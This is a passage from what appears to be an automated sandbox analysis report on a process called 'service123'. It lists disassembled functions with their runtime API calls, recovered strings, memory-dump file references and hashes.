malloc.MSVCRT ref: 6C76F85F
ReleaseSemaphore.KERNEL32 ref: 6C76F8E3

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 92ce1342193f90cee2b06cf9da92dcaf4cbb2c9bb1dd894531e1ef30da604dc2
Instruction ID: 4b15ef354811965e187fa1fad2b1ef6217d2f71ff186428d24d8e33fe7692005
Opcode Fuzzy Hash: 92ce1342193f90cee2b06cf9da92dcaf4cbb2c9bb1dd894531e1ef30da604dc2
Instruction Fuzzy Hash: EC31067070A301DFDB20AF2EC6487067BF0BB4671CF158A6DE8588BA90D3759549DBD2

Function 6C76FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C76FCEC
ReleaseSemaphore.KERNEL32 ref: 6C76FD7C
CreateSemaphoreW.KERNEL32 ref: 6C76FDC7
WaitForSingleObject.KERNEL32 ref: 6C76FE10

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 21505b7ef0ed9e9a63e448fb330086642f564f9e933ecd7e776e9c41dbe2ecac
Instruction ID: 21ee96638deaea6399e984edf147f308bc9ecc53e334fd48b2db5cbe72a35c8c
Opcode Fuzzy Hash: 21505b7ef0ed9e9a63e448fb330086642f564f9e933ecd7e776e9c41dbe2ecac
Instruction Fuzzy Hash: 5D31077070A200CFDB20AF6EC6987067BF1AB0671CF159679E9588BA80D338E445CBD2

Function 6C8282D0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C8282E5
strlen.MSVCRT ref: 6C828333
memcpy.MSVCRT ref: 6C828350
setlocale.MSVCRT ref: 6C828364
setlocale.MSVCRT ref: 6C82839A

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 563f66c084d1c386e2f02572421b2c5d94739307a053a81ae3d3b34bdc48231b
Instruction ID: 07996888f8fd9f64aa6eb6e09be52c8995ca5ef236275ec5076fdbc7ba8b75d3
Opcode Fuzzy Hash: 563f66c084d1c386e2f02572421b2c5d94739307a053a81ae3d3b34bdc48231b
Instruction Fuzzy Hash: 3621E4B150A3509FDB50AF68D58865EBBE0BF88258F418D2EE5C8C7301E738C945CF92

Function 6C779530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C779549
_unlock.MSVCRT ref: 6C779571
calloc.MSVCRT ref: 6C7795BF

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: f2598e01f34313ca60232a04aafaae6572ffe65c4549b558af4d463700522c31
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 35116A706062248FDF609F2CC684686BBE0BF95344F158679D898CF785EB30D844CBA2

Function 6C770290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C7702BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C7704DE), ref: 6C7702CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C7704DE), ref: 6C770300

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 31877f1e35058d7ea93a6ab3e31e43345c54c8939d9c035353d1afb7523d9108
Instruction ID: 02d3d0c2af892879dfa2ff07a23a31311a4d87ab3eea62eb07c28ca96ce08eb5
Opcode Fuzzy Hash: 31877f1e35058d7ea93a6ab3e31e43345c54c8939d9c035353d1afb7523d9108
Instruction Fuzzy Hash: B0F0BD7064A245DBDB207F6DC64D31A7AB0BB43328F508A6CE46A87E90E7354004CBA2

Function 001E4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 001E4C27
@, xrefs: 001E4647

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 3b5805f265bc2f825679ee29a281483936c69174642431937a77564cdeb46d37
Instruction ID: ba65ddb1a7f4415fece958f3ba4b3ecfc42d720a0970cf40e2196f32031f4d2a
Opcode Fuzzy Hash: 3b5805f265bc2f825679ee29a281483936c69174642431937a77564cdeb46d37
Instruction Fuzzy Hash: 1DA19C31608BD18BD7318F26C0907AEBBE1BF85714F158A1EE8D987386D735D906DB82

Function 6C7752CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 6C7752F7
@, xrefs: 6C774D17

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 06d04e8ea20559e816e14745f4c3655ee9a94e3ff69ece12b08e18e1193223e8
Instruction ID: 1e4a72ff65f0430d28615fd4b0a56e932e3d0a41f0effebce945283abf5a2f52
Opcode Fuzzy Hash: 06d04e8ea20559e816e14745f4c3655ee9a94e3ff69ece12b08e18e1193223e8
Instruction Fuzzy Hash: E4A1BF7160C3998BDB308F24D68439AB7E1BF85308F148A2DE8DC87751D735D90ADBA2

Function 001E1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 001E1DF3
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 001E1C20
Unknown pseudo relocation bit size %d., xrefs: 001E1C6D

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: ff07351866f99f19f7519e88eb96839eced5a19fc76a411910b55fdd54adb99e
Instruction ID: 0091399cd8f6cb2b5de51cb44441b6cf4959219bff5ca1e47e63c32cf961c1ed
Opcode Fuzzy Hash: ff07351866f99f19f7519e88eb96839eced5a19fc76a411910b55fdd54adb99e
Instruction Fuzzy Hash: 9081C371A00B95EBCB10DFAAD88069DB7F1FF88340F558929E894EB354D330F9548B92

Function 6C76A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 6C76AB43
Unknown pseudo relocation bit size %d., xrefs: 6C76A9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C76A970

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 309b587d64fc8e7a8369c344155063dc288d4b04280c2307cb3ef400b1d0f9b6
Instruction ID: 7854208bbc47fb0286ef1b176482e9d9249178d563e0ae28c2b73265b3f99d99
Opcode Fuzzy Hash: 309b587d64fc8e7a8369c344155063dc288d4b04280c2307cb3ef400b1d0f9b6
Instruction Fuzzy Hash: 9471CE32A0562A8BCB10CF2BC68469EB7B0FF45328F25C52ADD55ABF05D330E805CB91

Function 001E80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 001E80F2
strchr.MSVCRT ref: 001E8102
atoi.MSVCRT ref: 001E8113

Strings

., xrefs: 001E80F7

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: ec984940dce4b43ed46527aba54fb9087ab7b61ee8352ddbf27823b6e41d79aa
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: FCE0ECB1904B818ED7487F39C90A31EBAE1AB90300F498C6CE48C97245EB7998469752

Function 6C779128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C779142
strchr.MSVCRT ref: 6C779152
atoi.MSVCRT ref: 6C779163

Strings

., xrefs: 6C779147

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction ID: 7c9da27a62d34201f0f962ee74595461ad54e55d15b813c47e71737d08f84d42
Opcode Fuzzy Hash: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction Fuzzy Hash: 5AE08CB09067018ADF107F38CA0C3AAB6E1BB90308F868C2CC48887700EB398408C763

Function 6C779293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C77929F
GetProcAddress.KERNEL32 ref: 6C7792B3

Strings

SystemFunction036, xrefs: 6C7792A8
advapi32.dll, xrefs: 6C779298

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 7eabfb6167a581f29f8e84b4733c9cf889b336cb0e63ce92048c4fbf953d2d7a
Instruction ID: 02dc82c8a08d93d3e0372884f59d1f573a0ee0e47f874a4ce58faa17ec211a94
Opcode Fuzzy Hash: 7eabfb6167a581f29f8e84b4733c9cf889b336cb0e63ce92048c4fbf953d2d7a
Instruction Fuzzy Hash: FAE04FB199A200CBCB20BF78960604ABFF0B646324F408D3EE08997610D3349008DB97

Function 6C771409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C7714D2

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: f6f2c7f9e66858115c4938112a9283ba64d76e05856f847e7ec7bba63e0bd572
Instruction ID: 556f86d8918e372a238b3bbb6c4de7f165299fcd89ee575309c9808bfa80aaf3
Opcode Fuzzy Hash: f6f2c7f9e66858115c4938112a9283ba64d76e05856f847e7ec7bba63e0bd572
Instruction Fuzzy Hash: A5220175A097448FCB20CF29C68875ABBE1BFC9308F11892EE9D897710D734E845CB92

Function 6C76A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C76A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C77C1CC), ref: 6C76A3E0
free.MSVCRT ref: 6C76A3EA

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: ac5a828d27b7314568b19ce3f62d24415e94340f8a749461db6f51395a1ddc6d
Instruction ID: 272c00c35e8bf4aeb5cfb003f979cb8f1019fced10e6dbb7adce32b3417a1b9e
Opcode Fuzzy Hash: ac5a828d27b7314568b19ce3f62d24415e94340f8a749461db6f51395a1ddc6d
Instruction Fuzzy Hash: E5313B7160A7218BD7009F2FDA8861BBBA1AFD1768F250A2DDDB447F40D731C8458792

Function 6C7B59F0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C7B5B24
memchr.MSVCRT ref: 6C7B5B43

Part of subcall function 6C8282D0: setlocale.MSVCRT ref: 6C8282E5

Strings

., xrefs: 6C7B5B35
-, xrefs: 6C7B5D22

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 8caad96ec59c338efc00200e7adc0e30f770d5dd2e699d028f257eb2f7901bcf
Instruction ID: 40faf6b588482afc2842597e73d0c2fc97bf32561e1442c95a7809873bc75550
Opcode Fuzzy Hash: 8caad96ec59c338efc00200e7adc0e30f770d5dd2e699d028f257eb2f7901bcf
Instruction Fuzzy Hash: 5CD148B09043599FCB40DFA8D18858EBBF1BF48314F148A2AE8A4EB751D734E945CF81

Function 6C7B5E30 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C7B5F5E
memchr.MSVCRT ref: 6C7B5F7D

Part of subcall function 6C8282D0: setlocale.MSVCRT ref: 6C8282E5

Strings

., xrefs: 6C7B5F6F
6, xrefs: 6C7B6166

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 3701a62090fdf606f265abb34d3d0c58bbe3da9626607c2e2e206c6a9059e65f
Instruction ID: c68b73f71a204e7c278137844ffc21858bfd127e316d86278b5a9af865bad33c
Opcode Fuzzy Hash: 3701a62090fdf606f265abb34d3d0c58bbe3da9626607c2e2e206c6a9059e65f
Instruction Fuzzy Hash: 95D149B19093599FCB00DFA8C58468EBBF0BF88354F148A2AE8A4EB751D734D945CF91

Function 6C830D40 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C830D85

Strings

basic_string::append, xrefs: 6C830DFD, 6C830E09, 6C830EFC, 6C830FBC

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 72d7abf8ac553bec57138c8a59299303eb3b3089be9d036d6f6512c0315769eb
Instruction ID: 9e69ca43c775829c862d45c483a62b6847f4898435bed85a199a829633b20671
Opcode Fuzzy Hash: 72d7abf8ac553bec57138c8a59299303eb3b3089be9d036d6f6512c0315769eb
Instruction Fuzzy Hash: 5DA155B1A052148FCB10EF69C6C469EBBF1FF89314F109969E8988B744D734E849CBD2

Function 6C7CB080 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C7C972F), ref: 6C7CB0E6
memcpy.MSVCRT(?,?,?,?,?,?,6C7C972F), ref: 6C7CB151
memcpy.MSVCRT(00000000,?,?,6C7C972F), ref: 6C7CB198

Strings

basic_string::assign, xrefs: 6C7CB1B3

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 6e1af6000419e42f570885df506838f2da5bdb3d678b5d930ee2dfebe4ade1df
Instruction ID: 9f4bdd80aaf469fdad49ccc2869297041e1bb8367591ff776128d04dc04349a6
Opcode Fuzzy Hash: 6e1af6000419e42f570885df506838f2da5bdb3d678b5d930ee2dfebe4ade1df
Instruction Fuzzy Hash: 06519B71B0A6128FDB10DF29C68861AF7F5FF95708B118A6DE4948B714E730E845CB83

Function 6C7D41C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C7D4221
memcpy.MSVCRT ref: 6C7D428F
memcpy.MSVCRT ref: 6C7D42C8

Strings

basic_string::assign, xrefs: 6C7D42E4

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
